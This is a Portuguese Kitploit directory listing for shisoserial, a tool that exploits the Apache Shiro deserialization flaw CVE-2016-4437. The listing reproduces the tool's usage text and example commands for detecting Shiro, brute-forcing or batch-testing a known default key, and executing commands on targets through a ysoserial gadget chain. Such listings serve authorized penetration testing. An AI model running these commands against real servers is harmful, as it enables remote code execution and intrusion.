Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
shisoserial — uma ferramenta de exploração rápida para a vulnerabilidade de desserialização do Shiro (CVE-2016-4437)/A simple tool targeted at shiro framework attacks with ysoserial. | Kitploit
Ferramentas/GitHubGitHub/4nth0ny1130/shisoserial
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e Controle
GitHub4nth0ny1130/shisoserial

shisoserial

uma ferramenta de exploração rápida para a vulnerabilidade de desserialização do Shiro (CVE-2016-4437)/A simple tool targeted at shiro framework attacks with ysoserial.

Ver Repositório
242há 4 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

shisoserial

Documento em Inglês

O que é isso?

Uma ferramenta de exploração rápida para a vulnerabilidade de desserialização do Shiro (CVE-2016-4437)

Contribuidores

4nth0ny @Friday Lab

Aceitamos issues/pull requests

:)

Ambiente

  • python 3.x

  • JDK 1.8

Instalação

root@kitploit:~
python3 -m pip install -r requirements.txt

para AttributeError: module 'Crypto.Cipher.AES' has no attribute 'MODE_GCM' ou No module named 'Crypto'

root@kitploit:~
python3 -m pip uninstall crypto pycryptodome
python3 -m pip install pycryptodome

Uso

root@kitploit:~
usage: shisoserial.py [-h] --mode MODE --url  [--type default:CBC] [--data] [--key] [--gadget] [--command default:whoami] [--proxies] [--ser] [--thread]

This is a simple tool to attack framework shiro with ysoserial

optional arguments:
  -h, --help            show this help message and exit
  --mode MODE, -m MODE  check/crack/yso/echo/encode
  --url , -u            Target URL address or the file containing the target URL
  --type default:CBC, -t default:CBC
                        Cipher Type, GCM or CBC
  --data , -d           Using this parameter will make HTTP request with POST method
  --key , -k            Specify a Shiro Key or will use dictionary brute force cracking
  --gadget , -g         Specific Ysoserial Gadget
  --command default:whoami, -c default:whoami
                        Specific Execute Command
  --proxies , -p        Specific Proxy
  --ser , -s            Specific serialize file name
  --thread , -T         Specific the number of threads

Exemplos

Verificar se o alvo utiliza o framework Shiro (usando criptografia CBC padrão)

root@kitploit:~
python3 shisoserial.py -m check -u http://127.0.0.1:8080

Usar proxy e criptografia CBC para brute force da chave Shiro alvo

root@kitploit:~
python3 shisoserial.py -m crack -u http://*.*.*.*:**** -t CBC -p ****://*.*.*.*:****/

Usar a cadeia de exploração CommonsCollectionsK1 para executar comando e obter o resultado

root@kitploit:~
python3 shisoserial.py -m echo -u http://127.0.0.1:8080 -g CommonsCollectionsK1 -c id

Usar requisição POST para validar em lote uma chave Shiro específica

root@kitploit:~
python3 shisoserial.py -m crack -u target_urls.txt -k kPH+bIxk5D2deZiIxcaaaA== -d username=1

image-20211229223405240

Usar arquivo de dados serializados para construir payload e enviar em lote com multithreading

root@kitploit:~
python3 shisoserial.py -m encode -u target_urls.txt -t cbc -s 1.ser -T 4

image-20211230181021173

Aviso de isenção de responsabilidade

Esta ferramenta deve ser usada apenas em atividades de segurança empresarial com autorização legal suficiente. Ao usar esta ferramenta, você deve garantir que todas as suas ações estejam em conformidade com as leis e regulamentos locais. Se você realizar qualquer ação ilegal ao usar esta ferramenta, assumirá todas as consequências. Todos os desenvolvedores e contribuidores desta ferramenta não assumem qualquer responsabilidade legal ou solidária. A menos que você tenha lido, compreendido completamente e aceitado todos os termos deste acordo, por favor, não instale nem use esta ferramenta. O seu uso ou qualquer outra forma de aceitação expressa ou implícita deste acordo será considerado como tendo lido e concordado com os termos deste acordo.

Baixar ferramenta